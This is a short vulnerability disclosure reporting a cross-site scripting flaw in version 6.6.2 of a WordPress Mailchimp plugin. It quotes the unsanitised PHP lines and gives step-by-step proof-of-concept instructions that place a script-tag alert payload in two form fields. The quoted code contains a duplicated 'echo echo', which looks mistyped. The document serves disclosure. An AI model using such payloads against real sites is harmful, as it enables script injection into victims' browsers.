WordPress Yikes Inc Easy Mailchimp Extender plugin version 6.6.2 suffers from a cross site scripting vulnerability.
c423a749c8f7efb16888e9b98084bd3a
[-] Title : word press plugin yikes-inc-easy-mailchimp-extender 6.6.2 -
Cross Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor :
https://wordpress.org/plugins/yikes-inc-easy-mailchimp-extender/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php
==============================================================================================
Vulnerable Source:
2: $form_data['field_name'] = $_POST['field_name']
36: echo echo $form_data['field_name'];
50: echo echo $form_data['field_type'];
===============================================================================================
POC :
http://localhost/wp-content/plugins/yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php
step 1 = Go To Web Page =
http://localhost/wp-content/plugins/yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php
Step 2 = In the box : "field_name" AND "field_type"
Step 3 = input box , Add JavaScript Code : <script>alert('XSS')</script>
===============================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : [email protected]
************************